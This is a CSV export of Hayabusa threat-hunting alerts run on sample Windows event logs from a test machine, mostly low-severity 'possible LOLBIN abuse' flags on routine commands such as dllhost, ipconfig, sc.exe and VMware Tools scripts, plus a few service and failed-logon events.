2016-09-04 23:39:28.137 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x224 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-05 00:10:41.119 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x740 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-05 00:10:41.316 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x44c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-15 11:13:20.120 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xd98 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-15 11:13:20.122 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0xfa0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-15 11:13:21.221 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x7a8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-15 11:13:21.470 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xa7c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-15 11:13:30.470 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xd50 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-15 12:28:48.887 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb94 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-15 12:28:49.170 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb64 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-15 23:50:16.005 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x820 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-15 23:50:16.427 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-15 23:50:25.279 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x56c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-16 00:01:09.025 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x628 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-16 00:01:09.291 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xda4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-16 05:09:57.316 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-16 05:09:57.628 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x110 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-16 05:28:03.628 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe64 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-16 05:28:03.894 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x744 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-18 07:53:42.990 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x9b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-18 07:53:44.147 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc64 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-18 07:53:44.490 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xab8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-18 07:53:53.459 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x268 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-18 07:56:17.454 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xb10 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-18 07:56:31.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-18 07:56:46.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-18 07:56:46.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-18 07:56:47.806 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-18 07:56:48.165 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-18 07:57:01.618 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x990 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-18 07:57:01.696 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0x9f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-18 07:57:03.862 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xb8c | User: IEUser | LID: 0x671c2",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-18 07:57:04.729 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xbf0 | User: IEUser | LID: 0x671c2,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-18 07:57:05.547 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc18 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-18 08:05:28.818 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-18 08:05:29.021 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-19 23:56:52.614 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0xb00 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-19 23:56:53.723 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x988 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-19 23:56:53.973 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x22c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-19 23:56:55.848 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x810 | User: IEUser | LID: 0x671f0",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-19 23:57:03.208 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x978 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-19 23:57:32.774 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb28 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-19 23:57:36.030 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x4a8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 00:09:39.097 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x944 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 00:09:42.379 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1ac | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 00:10:22.816 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf28 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 00:10:26.441 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1b8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 00:12:04.478 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0x14c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 00:12:15.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 00:13:03.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 00:13:04.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-20 00:13:05.430 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\poweron-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x678 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 00:13:05.758 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x790 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 00:13:06.461 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x454 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 00:13:14.758 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x974 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 00:13:14.868 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0x9d4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 00:13:18.164 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xb8c | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 00:13:18.465 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xbe0 | User: IEUser | LID: 0x6590f,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 00:13:20.357 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc28 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 00:13:40.443 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 00:13:40.474 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe94 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 00:14:08.521 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf74 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 00:14:09.193 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf98 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
